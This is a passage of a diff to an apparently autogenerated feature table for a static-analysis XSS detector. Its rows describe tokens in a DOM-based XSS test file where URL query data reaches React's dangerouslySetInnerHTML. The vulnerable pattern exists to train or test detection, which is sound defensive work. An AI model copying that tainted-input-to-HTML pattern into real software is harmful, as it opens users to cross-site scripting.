C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:76 | React.c ... nted}}) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:76 | React.c ... nted}}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:76 | exceptional return of React.c ... nted}}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:76 | exceptional return of React.c ... nted}}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:76 | exceptional return of React.c ... nted}}) | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:76 | exceptional return of React.c ... nted}}) | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:5:200:76 | exceptional return of React.c ... nted}}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:11:200:23 | createFactory | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:11:200:23 | createFactory | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:200:11:200:23 | createFactory | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:11:200:23 | createFactory | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:11:200:23 | createFactory | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:200:25:200:29 | "div" | CalleeFlexibleAccessPath | React.createFactory | | autogenerated/Xss/DomBasedXss/tst.js:200:25:200:29 | "div" | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:200:25:200:29 | "div" | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16863,6 +116632,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:200:32:200:75 | {danger ... inted}} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:200:32:200:75 | {danger ... inted}} | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:200:32:200:75 | {danger ... inted}} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:55 | dangero ... nerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:55 | dangero ... nerHTML | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:55 | dangero ... nerHTML | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:55 | dangero ... nerHTML | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:55 | dangero ... nerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:74 | dangero ... ainted} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:74 | dangero ... ainted} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:74 | dangero ... ainted} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:74 | dangero ... ainted} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:74 | dangero ... ainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:74 | dangero ... ainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:74 | dangero ... ainted} | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:74 | dangero ... ainted} | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:74 | dangero ... ainted} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:33:200:74 | dangero ... ainted} | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:200:58:200:74 | {__html: tainted} | CalleeFlexibleAccessPath | React.createFactory() | | autogenerated/Xss/DomBasedXss/tst.js:200:58:200:74 | {__html: tainted} | InputAccessPathFromCallee | 0.dangerouslySetInnerHTML | | autogenerated/Xss/DomBasedXss/tst.js:200:58:200:74 | {__html: tainted} | InputArgumentIndex | 0 | @@ -16872,6 +116656,21 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:200:58:200:74 | {__html: tainted} | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:200:58:200:74 | {__html: tainted} | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:200:58:200:74 | {__html: tainted} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:64 | __html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:64 | __html | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:64 | __html | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:64 | __html | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:64 | __html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:73 | __html: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:73 | __html: tainted | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:73 | __html: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:73 | __html: tainted | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:73 | __html: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:73 | __html: tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:73 | __html: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:73 | __html: tainted | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:73 | __html: tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:200:59:200:73 | __html: tainted | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:200:67:200:73 | tainted | CalleeFlexibleAccessPath | React.createFactory() | | autogenerated/Xss/DomBasedXss/tst.js:200:67:200:73 | tainted | InputAccessPathFromCallee | 0.dangerouslySetInnerHTML.__html | | autogenerated/Xss/DomBasedXss/tst.js:200:67:200:73 | tainted | InputArgumentIndex | 0 | @@ -16881,6 +116680,194 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:200:67:200:73 | tainted | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | | autogenerated/Xss/DomBasedXss/tst.js:200:67:200:73 | tainted | enclosingFunctionName | react | | autogenerated/Xss/DomBasedXss/tst.js:200:67:200:73 | tainted | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:202:5:221:5 | class C ... }\\n } | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:202:5:221:5 | class C ... }\\n } | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:202:5:221:5 | class C ... }\\n } | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:202:5:221:5 | class C ... }\\n } | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:202:5:221:5 | class C ... }\\n } | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:202:11:202:12 | C1 | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:202:11:202:12 | C1 | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:202:11:202:12 | C1 | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:202:11:202:12 | C1 | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:202:11:202:12 | C1 | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:202:22:202:26 | React | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:202:22:202:26 | React | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:202:22:202:26 | React | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:202:22:202:26 | React | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:202:22:202:26 | React | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:202:22:202:36 | React.Component | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:202:22:202:36 | React.Component | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:202:22:202:36 | React.Component | enclosingFunctionBody | tainted document location search React createElement div dangerouslySetInnerHTML __html tainted React createFactory div dangerouslySetInnerHTML __html tainted C1 React Component constructor state tainted1 tainted state notTainted dbLookup setState tainted2 tainted state tainted3 tainted state tainted4 tainted test $ myId html state tainted1 $ myId html state tainted2 $ myId html state tainted3 $ myId html state notTainted setState prevState $ myId html prevState tainted4 C2 React Component args constructor test $ myId html props tainted1 $ myId html props tainted2 $ myId html props tainted3 $ myId html props notTainted setState prevState prevProps $ myId html prevProps tainted4 C2 defaultProps tainted1 tainted C2 tainted2 tainted C2 tainted3 tainted C2 tainted4 tainted C3 React Component constructor props props state stateTainted props propTainted render span dangerouslySetInnerHTML __html state stateTainted C3 propTainted tainted | +| autogenerated/Xss/DomBasedXss/tst.js:202:22:202:36 | React.Component | enclosingFunctionName | react | +| autogenerated/Xss/DomBasedXss/tst.js:202:22:202:36 | React.Component | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:202:28:202:36 | Component | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, 